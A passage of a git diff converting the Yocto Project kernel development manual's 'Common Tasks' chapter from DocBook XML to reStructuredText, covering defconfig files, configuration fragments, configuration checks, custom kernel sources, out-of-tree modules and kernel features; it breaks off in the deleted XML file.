+   The previous example directory is artificially split and many of the
+   characters in the actual filename are omitted in order to make it
+   more readable. Also, depending on the kernel you are using, the exact
+   pathname might differ.
+
+Within the ``.config`` file, you can see the kernel settings. For
+example, the following entry shows that symmetric multi-processor
+support is not set:
+::
+
+   # CONFIG_SMP is not set
+
+A good method to isolate changed configurations is to use a combination
+of the ``menuconfig`` tool and simple shell commands. Before changing
+configurations with ``menuconfig``, copy the existing ``.config`` and
+rename it to something else, use ``menuconfig`` to make as many changes
+as you want and save them, then compare the renamed configuration file
+against the newly created file. You can use the resulting differences as
+your base to create configuration fragments to permanently save in your
+kernel layer.
+
+.. note::
+
+   Be sure to make a copy of the ``.config`` file and do not just rename it.
+   The build system needs an existing ``.config`` file from which to work.
+
+Creating a  ``defconfig`` File
+------------------------------
+
+A ``defconfig`` file in the context of the Yocto Project is often a
+``.config`` file that is copied from a build or a ``defconfig`` taken
+from the kernel tree and moved into recipe space. You can use a
+``defconfig`` file to retain a known set of kernel configurations from
+which the OpenEmbedded build system can draw to create the final
+``.config`` file.
+
+.. note::
+
+   Out-of-the-box, the Yocto Project never ships a ``defconfig`` or ``.config``
+   file. The OpenEmbedded build system creates the final ``.config`` file used
+   to configure the kernel.
+
+To create a ``defconfig``, start with a complete, working Linux kernel
+``.config`` file. Copy that file to the appropriate
+``${``\ :term:`PN`\ ``}`` directory in
+your layer's ``recipes-kernel/linux`` directory, and rename the copied
+file to "defconfig" (e.g.
+``~/meta-mylayer/recipes-kernel/linux/linux-yocto/defconfig``). Then,
+add the following lines to the linux-yocto ``.bbappend`` file in your
+layer:
+::
+
+   FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+   SRC_URI += "file://defconfig"
+
+The :term:`SRC_URI` tells the build system how to search for the file, while the
+:term:`FILESEXTRAPATHS` extends the :term:`FILESPATH`
+variable (search directories) to include the ``${PN}`` directory you
+created to hold the configuration changes.
+
+.. note::
+
+   The build system applies the configurations from the ``defconfig``
+   file before applying any subsequent configuration fragments. The
+   final kernel configuration is a combination of the configurations in
+   the ``defconfig`` file and any configuration fragments you provide. You need
+   to realize that if you have any configuration fragments, the build system
+   applies these on top of and after applying the existing ``defconfig`` file
+   configurations.
+
+For more information on configuring the kernel, see the "`Changing the
+Configuration <#changing-the-configuration>`__" section.
+
+.. _creating-config-fragments:
+
+Creating Configuration Fragments
+--------------------------------
+
+Configuration fragments are simply kernel options that appear in a file
+placed where the OpenEmbedded build system can find and apply them. The
+build system applies configuration fragments after applying
+configurations from a ``defconfig`` file. Thus, the final kernel
+configuration is a combination of the configurations in the
+``defconfig`` file and then any configuration fragments you provide. The
+build system applies fragments on top of and after applying the existing
+defconfig file configurations.
+
+Syntactically, the configuration statement is identical to what would
+appear in the ``.config`` file, which is in the :term:`Build Directory`.
+
+.. note::
+
+   For more information about where the ``.config`` file is located, see the
+   example in the
+   ":ref:`kernel-dev/kernel-dev-common:using \`\`menuconfig\`\``"
+   section.
+
+It is simple to create a configuration fragment. One method is to use
+shell commands. For example, issuing the following from the shell
+creates a configuration fragment file named ``my_smp.cfg`` that enables
+multi-processor support within the kernel:
+::
+
+   $ echo "CONFIG_SMP=y" >> my_smp.cfg
+
+.. note::
+
+   All configuration fragment files must use the ``.cfg`` extension in order
+   for the OpenEmbedded build system to recognize them as a configuration
+   fragment.
+
+Another method is to create a configuration fragment using the
+differences between two configuration files: one previously created and
+saved, and one freshly created using the ``menuconfig`` tool.
+
+To create a configuration fragment using this method, follow these
+steps:
+
+1. *Complete a Build Through Kernel Configuration:* Complete a build at
+   least through the kernel configuration task as follows:
+   ::
+
+      $ bitbake linux-yocto -c kernel_configme -f
+
+   This step ensures that you create a
+   ``.config`` file from a known state. Because situations exist where
+   your build state might become unknown, it is best to run this task
+   prior to starting ``menuconfig``.
+
+2. *Launch menuconfig:* Run the ``menuconfig`` command:
+   ::
+
+      $ bitbake linux-yocto -c menuconfig
+
+3. *Create the Configuration Fragment:* Run the ``diffconfig`` command
+   to prepare a configuration fragment. The resulting file
+   ``fragment.cfg`` is placed in the
+   ``${``\ :term:`WORKDIR`\ ``}``
+   directory:
+   ::
+
+      $ bitbake linux-yocto -c diffconfig
+
+The ``diffconfig`` command creates a file that is a list of Linux kernel
+``CONFIG_`` assignments. See the "`Changing the
+Configuration <#changing-the-configuration>`__" section for additional
+information on how to use the output as a configuration fragment.
+
+.. note::
+
+   You can also use this method to create configuration fragments for a
+   BSP. See the ":ref:`kernel-dev/kernel-dev-advanced:bsp descriptions`"
+   section for more information.
+
+Where do you put your configuration fragment files? You can place these
+files in an area pointed to by
+:term:`SRC_URI` as directed by your
+``bblayers.conf`` file, which is located in your layer. The OpenEmbedded
+build system picks up the configuration and adds it to the kernel's
+configuration. For example, suppose you had a set of configuration
+options in a file called ``myconfig.cfg``. If you put that file inside a
+directory named ``linux-yocto`` that resides in the same directory as
+the kernel's append file within your layer and then add the following
+statements to the kernel's append file, those configuration options will
+be picked up and applied when the kernel is built:
+::
+
+   FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+   SRC_URI += "file://myconfig.cfg"
+
+As mentioned earlier, you can group related configurations into multiple
+files and name them all in the ``SRC_URI`` statement as well. For
+example, you could group separate configurations specifically for
+Ethernet and graphics into their own files and add those by using a
+``SRC_URI`` statement like the following in your append file:
+::
+
+   SRC_URI += "file://myconfig.cfg \
+               file://eth.cfg \
+               file://gfx.cfg"
+
+Validating Configuration
+------------------------
+
+You can use the
+:ref:`ref-tasks-kernel_configcheck`
+task to provide configuration validation:
+::
+
+   $ bitbake linux-yocto -c kernel_configcheck -f
+
+Running this task produces warnings for when a
+requested configuration does not appear in the final ``.config`` file or
+when you override a policy configuration in a hardware configuration
+fragment.
+
+In order to run this task, you must have an existing ``.config`` file.
+See the ":ref:`kernel-dev/kernel-dev-common:using \`\`menuconfig\`\``" section for
+information on how to create a configuration file.
+
+Following is sample output from the ``do_kernel_configcheck`` task:
+
+.. code-block:: none
+
+   Loading cache: 100% |########################################################| Time: 0:00:00
+   Loaded 1275 entries from dependency cache.
+   NOTE: Resolving any missing task queue dependencies
+
+   Build Configuration:
+       .
+       .
+       .
+
+   NOTE: Executing SetScene Tasks
+   NOTE: Executing RunQueue Tasks
+   WARNING: linux-yocto-4.12.12+gitAUTOINC+eda4d18ce4_16de014967-r0 do_kernel_configcheck:
+       [kernel config]: specified values did not make it into the kernel's final configuration:
+
+   ---------- CONFIG_X86_TSC -----------------
+   Config: CONFIG_X86_TSC
+   From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/bsp/common-pc/common-pc-cpu.cfg
+   Requested value:  CONFIG_X86_TSC=y
+   Actual value:
+
+
+   ---------- CONFIG_X86_BIGSMP -----------------
+   Config: CONFIG_X86_BIGSMP
+   From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/cfg/smp.cfg
+         /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/defconfig
+   Requested value:  # CONFIG_X86_BIGSMP is not set
+   Actual value:
+
+
+   ---------- CONFIG_NR_CPUS -----------------
+   Config: CONFIG_NR_CPUS
+   From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/cfg/smp.cfg
+         /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/bsp/common-pc/common-pc.cfg
+         /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/defconfig
+   Requested value:  CONFIG_NR_CPUS=8
+   Actual value:     CONFIG_NR_CPUS=1
+
+
+   ---------- CONFIG_SCHED_SMT -----------------
+   Config: CONFIG_SCHED_SMT
+   From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/cfg/smp.cfg
+         /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/defconfig
+   Requested value:  CONFIG_SCHED_SMT=y
+   Actual value:
+
+
+
+   NOTE: Tasks Summary: Attempted 288 tasks of which 285 didn't need to be rerun and all succeeded.
+
+   Summary: There were 3 WARNING messages shown.
+
+.. note::
+
+   The previous output example has artificial line breaks to make it
+   more readable.
+
+The output describes the various problems that you can encounter along
+with where to find the offending configuration items. You can use the
+information in the logs to adjust your configuration files and then
+repeat the
+:ref:`ref-tasks-kernel_configme`
+and
+:ref:`ref-tasks-kernel_configcheck`
+tasks until they produce no warnings.
+
+For more information on how to use the ``menuconfig`` tool, see the
+:ref:`kernel-dev/kernel-dev-common:using \`\`menuconfig\`\`` section.
+
+Fine-Tuning the Kernel Configuration File
+-----------------------------------------
+
+You can make sure the ``.config`` file is as lean or efficient as
+possible by reading the output of the kernel configuration fragment
+audit, noting any issues, making changes to correct the issues, and then
+repeating.
+
+As part of the kernel build process, the ``do_kernel_configcheck`` task
+runs. This task validates the kernel configuration by checking the final
+``.config`` file against the input files. During the check, the task
+produces warning messages for the following issues:
+
+-  Requested options that did not make the final ``.config`` file.
+
+-  Configuration items that appear twice in the same configuration
+   fragment.
+
+-  Configuration items tagged as "required" that were overridden.
+
+-  A board overrides a non-board specific option.
+
+-  Listed options not valid for the kernel being processed. In other
+   words, the option does not appear anywhere.
+
+.. note::
+
+   The :ref:`ref-tasks-kernel_configcheck` task can also optionally report if
+   an option is overridden during processing.
+
+For each output warning, a message points to the file that contains a
+list of the options and a pointer to the configuration fragment that
+defines them. Collectively, the files are the key to streamlining the
+configuration.
+
+To streamline the configuration, do the following:
+
+1. *Use a Working Configuration:* Start with a full configuration that
+   you know works. Be sure the configuration builds and boots
+   successfully. Use this configuration file as your baseline.
+
+2. *Run Configure and Check Tasks:* Separately run the
+   ``do_kernel_configme`` and ``do_kernel_configcheck`` tasks:
+   ::
+
+      $ bitbake linux-yocto -c kernel_configme -f
+      $ bitbake linux-yocto -c kernel_configcheck -f
+
+3. *Process the Results:* Take the resulting list of files from the
+   ``do_kernel_configcheck`` task warnings and do the following:
+
+   -  Drop values that are redefined in the fragment but do not change
+      the final ``.config`` file.
+
+   -  Analyze and potentially drop values from the ``.config`` file that
+      override required configurations.
+
+   -  Analyze and potentially remove non-board specific options.
+
+   -  Remove repeated and invalid options.
+
+4. *Re-Run Configure and Check Tasks:* After you have worked through the
+   output of the kernel configuration audit, you can re-run the
+   ``do_kernel_configme`` and ``do_kernel_configcheck`` tasks to see the
+   results of your changes. If you have more issues, you can deal with
+   them as described in the previous step.
+
+Iteratively working through steps two through four eventually yields a
+minimal, streamlined configuration file. Once you have the best
+``.config``, you can build the Linux Yocto kernel.
+
+Expanding Variables
+===================
+
+Sometimes it is helpful to determine what a variable expands to during a
+build. You can examine the values of variables by examining the
+output of the ``bitbake -e`` command. The output is long and is more
+easily managed in a text file, which allows for easy searches:
+::
+
+   $ bitbake -e virtual/kernel > some_text_file
+
+Within the text file, you can see
+exactly how each variable is expanded and used by the OpenEmbedded build
+system.
+
+Working with a "Dirty" Kernel Version String
+============================================
+
+If you build a kernel image and the version string has a "+" or a
+"-dirty" at the end, uncommitted modifications exist in the kernel's
+source directory. Follow these steps to clean up the version string:
+
+1. *Discover the Uncommitted Changes:* Go to the kernel's locally cloned
+   Git repository (source directory) and use the following Git command
+   to list the files that have been changed, added, or removed:
+   ::
+
+      $ git status
+
+2. *Commit the Changes:* You should commit those changes to the kernel
+   source tree regardless of whether or not you will save, export, or
+   use the changes:
+   ::
+
+      $ git add
+      $ git commit -s -a -m "getting rid of -dirty"
+
+3. *Rebuild the Kernel Image:* Once you commit the changes, rebuild the
+   kernel.
+
+   Depending on your particular kernel development workflow, the
+   commands you use to rebuild the kernel might differ. For information
+   on building the kernel image when using ``devtool``, see the
+   ":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+   section. For
+   information on building the kernel image when using Bitbake, see the
+   "`Using Traditional Kernel Development to Patch the
+   Kernel <#using-traditional-kernel-development-to-patch-the-kernel>`__"
+   section.
+
+Working With Your Own Sources
+=============================
+
+If you cannot work with one of the Linux kernel versions supported by
+existing linux-yocto recipes, you can still make use of the Yocto
+Project Linux kernel tooling by working with your own sources. When you
+use your own sources, you will not be able to leverage the existing
+kernel :term:`Metadata` and stabilization
+work of the linux-yocto sources. However, you will be able to manage
+your own Metadata in the same format as the linux-yocto sources.
+Maintaining format compatibility facilitates converging with linux-yocto
+on a future, mutually-supported kernel version.
+
+To help you use your own sources, the Yocto Project provides a
+linux-yocto custom recipe (``linux-yocto-custom.bb``) that uses
+``kernel.org`` sources and the Yocto Project Linux kernel tools for
+managing kernel Metadata. You can find this recipe in the ``poky`` Git
+repository of the Yocto Project :yocto_git:`Source Repository <>`
+at:
+::
+
+   poky/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
+
+Here are some basic steps you can use to work with your own sources:
+
+1. *Create a Copy of the Kernel Recipe:* Copy the
+   ``linux-yocto-custom.bb`` recipe to your layer and give it a
+   meaningful name. The name should include the version of the Yocto
+   Linux kernel you are using (e.g. ``linux-yocto-myproject_4.12.bb``,
+   where "4.12" is the base version of the Linux kernel with which you
+   would be working).
+
+2. *Create a Directory for Your Patches:* In the same directory inside
+   your layer, create a matching directory to store your patches and
+   configuration files (e.g. ``linux-yocto-myproject``).
+
+3. *Ensure You Have Configurations:* Make sure you have either a
+   ``defconfig`` file or configuration fragment files in your layer.
+   When you use the ``linux-yocto-custom.bb`` recipe, you must specify a
+   configuration. If you do not have a ``defconfig`` file, you can run
+   the following:
+   ::
+
+      $ make defconfig
+
+   After running the command, copy the
+   resulting ``.config`` file to the ``files`` directory in your layer
+   as "defconfig" and then add it to the
+   :term:`SRC_URI` variable in the
+   recipe.
+
+   Running the ``make defconfig`` command results in the default
+   configuration for your architecture as defined by your kernel.
+   However, no guarantee exists that this configuration is valid for
+   your use case, or that your board will even boot. This is
+   particularly true for non-x86 architectures.
+
+   To use non-x86 ``defconfig`` files, you need to be more specific and
+   find one that matches your board (i.e. for arm, you look in
+   ``arch/arm/configs`` and use the one that is the best starting point
+   for your board).
+
+4. *Edit the Recipe:* Edit the following variables in your recipe as
+   appropriate for your project:
+
+   -  :term:`SRC_URI`: The
+      ``SRC_URI`` should specify a Git repository that uses one of the
+      supported Git fetcher protocols (i.e. ``file``, ``git``, ``http``,
+      and so forth). The ``SRC_URI`` variable should also specify either
+      a ``defconfig`` file or some configuration fragment files. The
+      skeleton recipe provides an example ``SRC_URI`` as a syntax
+      reference.
+
+   -  :term:`LINUX_VERSION`:
+      The Linux kernel version you are using (e.g. "4.12").
+
+   -  :term:`LINUX_VERSION_EXTENSION`:
+      The Linux kernel ``CONFIG_LOCALVERSION`` that is compiled into the
+      resulting kernel and visible through the ``uname`` command.
+
+   -  :term:`SRCREV`: The commit ID
+      from which you want to build.
+
+   -  :term:`PR`: Treat this variable the
+      same as you would in any other recipe. Increment the variable to
+      indicate to the OpenEmbedded build system that the recipe has
+      changed.
+
+   -  :term:`PV`: The default ``PV``
+      assignment is typically adequate. It combines the
+      ``LINUX_VERSION`` with the Source Control Manager (SCM) revision
+      as derived from the :term:`SRCPV`
+      variable. The combined results are a string with the following
+      form:
+      ::
+
+         3.19.11+git1+68a635bf8dfb64b02263c1ac80c948647cc76d5f_1+218bd8d2022b9852c60d32f0d770931e3cf343e2
+
+      While lengthy, the extra verbosity in ``PV`` helps ensure you are
+      using the exact sources from which you intend to build.
+
+   -  :term:`COMPATIBLE_MACHINE`:
+      A list of the machines supported by your new recipe. This variable
+      in the example recipe is set by default to a regular expression
+      that matches only the empty string, "(^$)". This default setting
+      triggers an explicit build failure. You must change it to match a
+      list of the machines that your new recipe supports. For example,
+      to support the ``qemux86`` and ``qemux86-64`` machines, use the
+      following form:
+      ::
+
+         COMPATIBLE_MACHINE = "qemux86|qemux86-64"
+
+5. *Customize Your Recipe as Needed:* Provide further customizations to
+   your recipe as needed just as you would customize an existing
+   linux-yocto recipe. See the "`Modifying an Existing
+   Recipe <#modifying-an-existing-recipe>`__" section for information.
+
+Working with Out-of-Tree Modules
+================================
+
+This section describes steps to build out-of-tree modules on your target
+and describes how to incorporate out-of-tree modules in the build.
+
+Building Out-of-Tree Modules on the Target
+------------------------------------------
+
+While the traditional Yocto Project development model would be to
+include kernel modules as part of the normal build process, you might
+find it useful to build modules on the target. This could be the case if
+your target system is capable and powerful enough to handle the
+necessary compilation. Before deciding to build on your target, however,
+you should consider the benefits of using a proper cross-development
+environment from your build host.
+
+If you want to be able to build out-of-tree modules on the target, there
+are some steps you need to take on the target that is running your SDK
+image. Briefly, the ``kernel-dev`` package is installed by default on
+all ``*.sdk`` images and the ``kernel-devsrc`` package is installed on
+many of the ``*.sdk`` images. However, you need to create some scripts
+prior to attempting to build the out-of-tree modules on the target that
+is running that image.
+
+Prior to attempting to build the out-of-tree modules, you need to be on
+the target as root and you need to change to the ``/usr/src/kernel``
+directory. Next, ``make`` the scripts:
+
+.. code-block:: none
+
+   # cd /usr/src/kernel
+   # make scripts
+
+Because all SDK image recipes include ``dev-pkgs``, the
+``kernel-dev`` packages will be installed as part of the SDK image and
+the ``kernel-devsrc`` packages will be installed as part of applicable
+SDK images. The SDK uses the scripts when building out-of-tree modules.
+Once you have switched to that directory and created the scripts, you
+should be able to build your out-of-tree modules on the target.
+
+Incorporating Out-of-Tree Modules
+---------------------------------
+
+While it is always preferable to work with sources integrated into the
+Linux kernel sources, if you need an external kernel module, the
+``hello-mod.bb`` recipe is available as a template from which you can
+create your own out-of-tree Linux kernel module recipe.
+
+This template recipe is located in the ``poky`` Git repository of the
+Yocto Project :yocto_git:`Source Repository <>` at:
+
+.. code-block:: none
+
+   poky/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
+
+To get started, copy this recipe to your layer and give it a meaningful
+name (e.g. ``mymodule_1.0.bb``). In the same directory, create a new
+directory named ``files`` where you can store any source files, patches,
+or other files necessary for building the module that do not come with
+the sources. Finally, update the recipe as needed for the module.
+Typically, you will need to set the following variables:
+
+-  :term:`DESCRIPTION`
+
+-  :term:`LICENSE* <LICENSE>`
+
+-  :term:`SRC_URI`
+
+-  :term:`PV`
+
+Depending on the build system used by the module sources, you might need
+to make some adjustments. For example, a typical module ``Makefile``
+looks much like the one provided with the ``hello-mod`` template:
+::
+
+   obj-m := hello.o
+
+   SRC := $(shell pwd)
+
+   all:
+   	$(MAKE) -C $(KERNEL_SRC) M=$(SRC)
+
+   modules_install:
+   	$(MAKE) -C $(KERNEL_SRC) M=$(SRC) modules_install
+   ...
+
+The important point to note here is the :term:`KERNEL_SRC` variable. The
+:ref:`module <ref-classes-module>` class sets this variable and the
+:term:`KERNEL_PATH` variable to
+``${STAGING_KERNEL_DIR}`` with the necessary Linux kernel build
+information to build modules. If your module ``Makefile`` uses a
+different variable, you might want to override the
+:ref:`ref-tasks-compile` step, or
+create a patch to the ``Makefile`` to work with the more typical
+``KERNEL_SRC`` or ``KERNEL_PATH`` variables.
+
+After you have prepared your recipe, you will likely want to include the
+module in your images. To do this, see the documentation for the
+following variables in the Yocto Project Reference Manual and set one of
+them appropriately for your machine configuration file:
+
+-  :term:`MACHINE_ESSENTIAL_EXTRA_RDEPENDS`
+
+-  :term:`MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`
+
+-  :term:`MACHINE_EXTRA_RDEPENDS`
+
+-  :term:`MACHINE_EXTRA_RRECOMMENDS`
+
+Modules are often not required for boot and can be excluded from certain
+build configurations. The following allows for the most flexibility:
+::
+
+   MACHINE_EXTRA_RRECOMMENDS += "kernel-module-mymodule"
+
+The value is
+derived by appending the module filename without the ``.ko`` extension
+to the string "kernel-module-".
+
+Because the variable is
+:term:`RRECOMMENDS` and not a
+:term:`RDEPENDS` variable, the build
+will not fail if this module is not available to include in the image.
+
+Inspecting Changes and Commits
+==============================
+
+A common question when working with a kernel is: "What changes have been
+applied to this tree?" Rather than using "grep" across directories to
+see what has changed, you can use Git to inspect or search the kernel
+tree. Using Git is an efficient way to see what has changed in the tree.
+
+What Changed in a Kernel?
+-------------------------
+
+Following are a few examples that show how to use Git commands to
+examine changes. These examples are by no means the only way to see
+changes.
+
+.. note::
+
+   In the following examples, unless you provide a commit range, ``kernel.org``
+   history is blended with Yocto Project kernel changes. You can form
+   ranges by using branch names from the kernel tree as the upper and
+   lower commit markers with the Git commands. You can see the branch
+   names through the web interface to the Yocto Project source
+   repositories at :yocto_git:`/`.
+
+To see a full range of the changes, use the ``git whatchanged`` command
+and specify a commit range for the branch (`commit`\ ``..``\ `commit`).
+
+Here is an example that looks at what has changed in the ``emenlow``
+branch of the ``linux-yocto-3.19`` kernel. The lower commit range is the
+commit associated with the ``standard/base`` branch, while the upper
+commit range is the commit associated with the ``standard/emenlow``
+branch.
+::
+
+   $ git whatchanged origin/standard/base..origin/standard/emenlow
+
+To see short, one line summaries of changes use the ``git log`` command:
+::
+
+   $ git log --oneline origin/standard/base..origin/standard/emenlow
+
+Use this command to see code differences for the changes:
+::
+
+   $ git diff origin/standard/base..origin/standard/emenlow
+
+Use this command to see the commit log messages and the text
+differences:
+::
+
+   $ git show origin/standard/base..origin/standard/emenlow
+
+Use this command to create individual patches for each change. Here is
+an example that that creates patch files for each commit and places them
+in your ``Documents`` directory:
+::
+
+   $ git format-patch -o $HOME/Documents origin/standard/base..origin/standard/emenlow
+
+Showing a Particular Feature or Branch Change
+---------------------------------------------
+
+Tags in the Yocto Project kernel tree divide changes for significant
+features or branches. The ``git show`` tag command shows changes based
+on a tag. Here is an example that shows ``systemtap`` changes:
+::
+
+   $ git show systemtap
+
+You can use the ``git branch --contains`` tag command to
+show the branches that contain a particular feature. This command shows
+the branches that contain the ``systemtap`` feature:
+::
+
+   $ git branch --contains systemtap
+
+Adding Recipe-Space Kernel Features
+===================================
+
+You can add kernel features in the
+:ref:`recipe-space <kernel-dev/kernel-dev-advanced:recipe-space metadata>`
+by using the :term:`KERNEL_FEATURES`
+variable and by specifying the feature's ``.scc`` file path in the
+:term:`SRC_URI` statement. When you
+add features using this method, the OpenEmbedded build system checks to
+be sure the features are present. If the features are not present, the
+build stops. Kernel features are the last elements processed for
+configuring and patching the kernel. Therefore, adding features in this
+manner is a way to enforce specific features are present and enabled
+without needing to do a full audit of any other layer's additions to the
+``SRC_URI`` statement.
+
+You add a kernel feature by providing the feature as part of the
+``KERNEL_FEATURES`` variable and by providing the path to the feature's
+``.scc`` file, which is relative to the root of the kernel Metadata. The
+OpenEmbedded build system searches all forms of kernel Metadata on the
+``SRC_URI`` statement regardless of whether the Metadata is in the
+"kernel-cache", system kernel Metadata, or a recipe-space Metadata (i.e.
+part of the kernel recipe). See the
+":ref:`kernel-dev/kernel-dev-advanced:kernel metadata location`" section for
+additional information.
+
+When you specify the feature's ``.scc`` file on the ``SRC_URI``
+statement, the OpenEmbedded build system adds the directory of that
+``.scc`` file along with all its subdirectories to the kernel feature
+search path. Because subdirectories are searched, you can reference a
+single ``.scc`` file in the ``SRC_URI`` statement to reference multiple
+kernel features.
+
+Consider the following example that adds the "test.scc" feature to the
+build.
+
+1. *Create the Feature File:* Create a ``.scc`` file and locate it just
+   as you would any other patch file, ``.cfg`` file, or fetcher item you
+   specify in the ``SRC_URI`` statement.
+
+   .. note::
+
+      -  You must add the directory of the ``.scc`` file to the
+         fetcher's search path in the same manner as you would add a
+         ``.patch`` file.
+
+      -  You can create additional ``.scc`` files beneath the directory
+         that contains the file you are adding. All subdirectories are
+         searched during the build as potential feature directories.
+
+   Continuing with the example, suppose the "test.scc" feature you are
+   adding has a ``test.scc`` file in the following directory:
+   ::
+
+      my_recipe
+      |
+      +-linux-yocto
+         |
+         +-test.cfg
+         +-test.scc
+
+   In this example, the
+   ``linux-yocto`` directory has both the feature ``test.scc`` file and
+   a similarly named configuration fragment file ``test.cfg``.
+
+2. *Add the Feature File to SRC_URI:* Add the ``.scc`` file to the
+   recipe's ``SRC_URI`` statement:
+   ::
+
+      SRC_URI_append = " file://test.scc"
+
+   The leading space before the path is important as the path is
+   appended to the existing path.
+
+3. *Specify the Feature as a Kernel Feature:* Use the
+   ``KERNEL_FEATURES`` statement to specify the feature as a kernel
+   feature:
+   ::
+
+      KERNEL_FEATURES_append = " test.scc"
+
+   The OpenEmbedded build
+   system processes the kernel feature when it builds the kernel.
+
+   .. note::
+
+      If other features are contained below "test.scc", then their
+      directories are relative to the directory containing the ``test.scc``
+      file.
diff --git a/documentation/kernel-dev/kernel-dev-common.xml b/documentation/kernel-dev/kernel-dev-common.xml
deleted file mode 100644
index c1c2d6d703..0000000000
--- a/documentation/kernel-dev/kernel-dev-common.xml
+++ /dev/null
@@ -1,2729 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='kernel-dev-common'>
-<title>Common Tasks</title>
-
-    <para>
-        This chapter presents several common tasks you perform when you
-        work with the Yocto Project Linux kernel.
-        These tasks include preparing your host development system for
-        kernel development, preparing a layer, modifying an existing recipe,
-        patching the kernel, configuring the kernel, iterative development,
-        working with your own sources, and incorporating out-of-tree modules.
-        <note>
-            The examples presented in this chapter work with the Yocto Project
-            2.4 Release and forward.
-        </note>
-    </para>
-
-    <section id='preparing-the-build-host-to-work-on-the-kernel'>
-        <title>Preparing the Build Host to Work on the Kernel</title>
-
-        <para>
-            Before you can do any kernel development, you need to be
-            sure your build host is set up to use the Yocto Project.
-            For information on how to get set up, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-preparing-the-build-host'>Preparing the Build Host</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-            Part of preparing the system is creating a local Git
-            repository of the
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-            (<filename>poky</filename>) on your system.
-            Follow the steps in the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</ulink>"
-            section in the Yocto Project Development Tasks Manual to set up your
-            Source Directory.
-            <note>
-                Be sure you check out the appropriate development branch or
-                you create your local branch by checking out a specific tag
-                to get the desired version of Yocto Project.
-                See the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#checking-out-by-branch-in-poky'>Checking Out by Branch in Poky</ulink>"
-                and
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#checkout-out-by-tag-in-poky'>Checking Out by Tag in Poky</ulink>"
-                sections in the Yocto Project Development Tasks Manual for more
-                information.
-            </note>
-        </para>
-
-        <para>
-            Kernel development is best accomplished using
-            <ulink url='&YOCTO_DOCS_SDK_URL;#using-devtool-in-your-sdk-workflow'><filename>devtool</filename></ulink>
-            and not through traditional kernel workflow methods.
-            The remainder of this section provides information for both
-            scenarios.
-        </para>
-
-        <section id='getting-ready-to-develop-using-devtool'>
-            <title>Getting Ready to Develop Using <filename>devtool</filename></title>
-
-            <para>
-                Follow these steps to prepare to update the kernel image using
-                <filename>devtool</filename>.
-                Completing this procedure leaves you with a clean kernel image
-                and ready to make modifications as described in the
-                "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
-                section:
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Initialize the BitBake Environment:</emphasis>
-                        Before building an extensible SDK, you need to
-                        initialize the BitBake build environment by sourcing the
-                        build environment script
-                        (i.e. <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>oe-init-build-env</filename></ulink>):
-                        <literallayout class='monospaced'>
-     $ cd ~/poky
-     $ source oe-init-build-env
-                        </literallayout>
-                        <note>
-                            The previous commands assume the
-                            <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
-                            (i.e. <filename>poky</filename>) have been cloned
-                            using Git and the local repository is named
-                            "poky".
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Prepare Your <filename>local.conf</filename> File:</emphasis>
-                        By default, the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                        variable is set to "qemux86-64", which is fine if you are
-                        building for the QEMU emulator in 64-bit mode.
-                        However, if you are not, you need to set the
-                        <filename>MACHINE</filename> variable appropriately in
-                        your <filename>conf/local.conf</filename> file found in
-                        the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                        (i.e. <filename>~/poky/build</filename> in this
-                        example).</para>
-
-                        <para>Also, since you are preparing to work on the
-                        kernel image, you need to set the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'><filename>MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</filename></ulink>
-                        variable to include kernel modules.</para>
-
-                        <para>In this example we wish to build for qemux86 so
-                        we must set the <filename>MACHINE</filename> variable
-                        to "qemux86" and also add the "kernel-modules". As described
-                        we do this by appending to <filename>conf/local.conf</filename>:
-                        <literallayout class='monospaced'>
-     MACHINE = "qemux86"
-     MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS += "kernel-modules"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Create a Layer for Patches:</emphasis>
-                        You need to create a layer to hold patches created
-                        for the kernel image.
-                        You can use the
-                        <filename>bitbake-layers create-layer</filename>
-                        command as follows:
-                        <literallayout class='monospaced'>
-     $ cd ~/poky/build
-     $ bitbake-layers create-layer ../../meta-mylayer
-     NOTE: Starting bitbake server...
-     Add your new layer with 'bitbake-layers add-layer ../../meta-mylayer'
-     $
-                        </literallayout>
-                        <note>
-                            For background information on working with
